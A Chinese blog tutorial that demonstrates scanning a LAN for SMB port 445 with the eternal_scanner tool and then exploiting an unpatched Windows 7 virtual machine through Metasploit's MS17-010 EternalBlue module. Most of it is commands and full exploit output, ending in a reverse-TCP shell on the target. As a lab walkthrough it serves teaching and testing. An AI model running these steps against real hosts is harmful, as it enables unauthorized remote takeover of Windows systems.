概述
好久没有写过关于工具的博客了,今天介绍的是EternalBlue漏洞扫描工具,支持扫描单个主机和一整个ip段
废话不多说,安装使用体验一下
使用
首先打开kali虚拟机,当然最好准备一台新安装的windows7虚拟机,window7要打开网络发现和文件共享,也就是要把445端口打开
之后下载工具
git clone https://github.com/peterpt/eternal_scanner.git
安装一些需要的工具
apt install masscan metasploit-framework wget
修改扫描速率为最大值扫描真个局域网并且运行
root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000
*****************************************
* ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄ ▐ ▄ ▄▄▄· ▄▄▌ *
* ▀▄.▀·•██ ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██• *
* ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪ *
* ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌ *
* ▀▀▀ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪ ▀ ▀ .▀▀▀ *
* .▄▄ · ▄▄· ▄▄▄· ▐ ▄ ▐ ▄ ▄▄▄ .▄▄▄ *
* ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
* ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄ *
* ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
* ▀▀▀▀ ·▀▀▀ ▀ ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀ ▀ *
*****************************************
* Current Version : 2.1 *
*****************************************
For switches write (escan -h)
Config Port: 445 | Rate Speed: 10000000 pkt/s
Enter IP or IP range .
Example 1 : 192.168.1.32
Example 2 : 192.168.1.1/24
IP/IP Range : 192.168.1.1/24
User IP Input : 192.168.1.1/24
Press CTRL-C (1X ONLY) to stop the scanner
Scanner started at 04:18:50 , Please Wait
Scanner stopped/finished at 04:19:08
It was not detected in 192.168.1.1/24 any port 445 opened.
一次完整的使用EternalBlue入侵windows7
之后我打开安装好的windows虚拟机,我们就入侵一下,事先说明这台机器全新安装,没有打过任何补丁,并且开启了网络发现和文件共享
首先我只知道这台机器在我的局域网中,但是不知道是什么ip地址
使用工具扫描
root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000
*****************************************
* ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄ ▐ ▄ ▄▄▄· ▄▄▌ *
* ▀▄.▀·•██ ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██• *
* ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪ *
* ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌ *
* ▀▀▀ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪ ▀ ▀ .▀▀▀ *
* .▄▄ · ▄▄· ▄▄▄· ▐ ▄ ▐ ▄ ▄▄▄ .▄▄▄ *
* ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
* ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄ *
* ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
* ▀▀▀▀ ·▀▀▀ ▀ ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀ ▀ *
*****************************************
* Current Version : 2.1 *
*****************************************
For switches write (escan -h)
Config Port: 445 | Rate Speed: 10000000 pkt/s
Enter IP or IP range .
Example 1 : 192.168.1.32
Example 2 : 192.168.1.1/24
IP/IP Range : 192.168.1.1/24
User IP Input : 192.168.1.1/24
Press CTRL-C (1X ONLY) to stop the scanner
Scanner started at 04:25:15 , Please Wait
Scanner stopped/finished at 04:25:35
Checking ips :
----------------------------
192.168.1.107
----------------------------
Collected 1 ips
Checking if the 1 ips above are vulnerable
Press CTRL-C (1X ONLY) to stop ips vulnerability check
(aborting this process will not verify all ips)
Please Wait , checking 1 ips may take a while
+---------------------------------------------------+
| Realtime Eternal Scan Metasploit results Checkout |
+---------------------------------------------------+
| Please wait for percentage output |
+---------------------------------------------------+
[*] Scanned 1 of 1 hosts (100% complete)
1 Vulnerable ips found
---------------------------------------
192.168.1.107
---------------------------------------
Eternal Scanner saved the vulnerable ips to /usr/local/share/Eternal_Scanner/vuln.txt
可以看出扫到了一个ip 192.168.1.107
并且把结果保存在了/usr/local/share/Eternal_Scanner/vuln.txt这个地方
之后,我们开始入侵
首先打开metasploit
搜索一下有没有漏洞利用模块,如果没有你要更新一下你的metasploit
root@kali:~/kali_tools/eternal_scanner# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.16.7-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 299 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search CVE-2017-0144
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf >
没错,有两个模块可以使用,第一个是扫描模块,第二个是漏洞利用模块,所以很简单,看下面我操作
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.107 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.104 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.1.107:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.104:4444 -> 192.168.1.107:49161) at 2017-10-18 04:35:41 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>
成功
欢迎关注我的博客www.bboy.app
Have Fun